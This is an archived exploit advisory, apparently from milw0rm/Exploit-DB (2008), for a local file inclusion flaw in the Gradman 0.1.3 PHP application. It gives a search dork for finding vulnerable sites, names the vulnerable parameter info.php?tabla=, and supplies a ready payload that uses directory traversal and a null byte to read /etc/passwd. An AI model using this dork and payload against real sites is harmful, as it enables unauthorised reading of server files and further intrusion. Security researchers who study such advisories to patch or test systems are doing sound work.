Gradman 0.1.3 - 'info.php' Local File Inclusion

EDB-ID:

4936

Author:

Syndr0me

Type:

webapps

Platform:

PHP

Published:

2008-01-18

Software: Gradman <= 0.1.3
HomePage: http://gradman.xe1ido.com.mx/
Software: Gradman <= 0.1.3
Exploit:  Local File Inclusion [High]
Dork:    "powered by Gradman"
Bug Found By: Syndr0me! site: www.remoteexecution.es
Where: info.php?tabla=
Greetz: S4nt0!, Yubix, Xarnuz, Chame, Electr0cbax, komtec1, f34r
[+] Exploit:
info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00

# milw0rm.com [2008-01-18]